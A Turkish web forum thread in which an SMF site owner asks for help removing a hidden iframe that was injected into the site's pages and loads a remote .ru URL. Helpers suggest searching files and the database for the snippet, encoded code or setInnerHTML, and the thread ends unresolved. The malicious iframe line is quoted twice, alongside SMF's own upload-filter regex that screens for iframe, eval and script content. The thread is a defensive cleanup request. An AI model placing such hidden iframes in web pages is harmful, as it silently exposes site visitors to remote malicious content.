Konu: İframe Virüsü  (Okunma sayısı 1043 defa)

0 Üye ve 1 Ziyaretçi konuyu incelemekte.

18 Ocak 2014, 19:08
  • mavice

Kod: [Seç]
<div style="visibility:hidden"><iframe src="http://djvu24.ru/htdocs/test.php" width=10 height=10></iframe></div>
Şöyle bir kod var.
Siteye girdikten sonra kaynak kodlarına baktığımızda sitenin en altında duruyor.

Sitedeki tüm dosyaları sildim, yenilerini yükledim. Duruyor.
Phpmyadmin arama yaptım, sonuç yok. Duruyor.



18 Ocak 2014, 19:17
Yanıtla #1
  • mavice


Advanced Find and Replace programı ile dosyalarda iframe diye arama yaptım.
Aşağıdaki dosyalarda çıktı.
Ama bu kodlar smf kendi kodlarımı bilmiyorum

Themes.template.php
Kod: [Seç]
<iframe id="css_preview_box" name="css_preview_box" src="about:blank" width="100%" height="300" frameborder="0" style="display: none; margin-bottom: 2ex; border: 1px solid black;"></iframe>';
Subs-Graphics.php
Kod: [Seç]
if (preg_match('~(iframe|\\<\\?php|\\<\\?[\s=]|\\<%[\s=]|html|eval|body|script\W)~', $fileContents) === 1)
if (preg_match('~(iframe|\\<\\?php|\\<\\?[\s=]|\\<%[\s=]|html|eval|body|script\W)~', $prev_chunk . $cur_chunk) === 1)


Sitede de şöyle bekletiyor.


18 Ocak 2014, 19:17
Yanıtla #2
  • *
    • İleti: 2018
    • Karma: 41
    • Spina Bifida
    • Profili Görüntüle

sitenin temasını değişir misiniz


18 Ocak 2014, 19:20
Yanıtla #3
  • mavice

Değiştirdim.
Aynı, değişen bir şey yok.


18 Ocak 2014, 19:25
Yanıtla #4
  • *
    • İleti: 2018
    • Karma: 41
    • Spina Bifida
    • Profili Görüntüle

Kod: [Seç]
<iframe src="http://djvu24.ru/htdocs/test.php" width=10 height=10></iframe>Yukarıdaki kodu ana dizindeki index.php ve veritabanında aratıp bulmaya çalışın.


18 Ocak 2014, 19:29
Yanıtla #5
  • *
    • İleti: 264
    • Karma: 14
    • smf destek
    • Profili Görüntüle

<div style="visibility:hidden">
index.templatede.php dosyanızda arayın


18 Ocak 2014, 19:31
Yanıtla #6
  • mavice

Ne index.php ne de veritabanı.
Yok.

<div style="visibility:hidden">
Bu şekilde de bir sonuç yok.
Hangi dosyada neyin nesidir anlamadım.

Tüm dosyalar sıfırdan siteden indirip yükledim. Dosyaların tamamını.

Veritabanında her şekil arama yaptım. Ama sonuç 0


18 Ocak 2014, 19:39
Yanıtla #7
  • *
    • İleti: 264
    • Karma: 14
    • smf destek
    • Profili Görüntüle

şifrelemiştir tam hatırlamıyorum ama codu ama
get65(şifreli kod) veya buna benzer bişeydi


18 Ocak 2014, 19:40
Yanıtla #8
  • *
    • İleti: 2018
    • Karma: 41
    • Spina Bifida
    • Profili Görüntüle

Kod: [Seç]
setInnerHTMLdiye bir kod var mı veritabanında


18 Ocak 2014, 19:47
Yanıtla #9
  • mavice

5 sonuç çıktı. Ama anlayamadım kodlardan.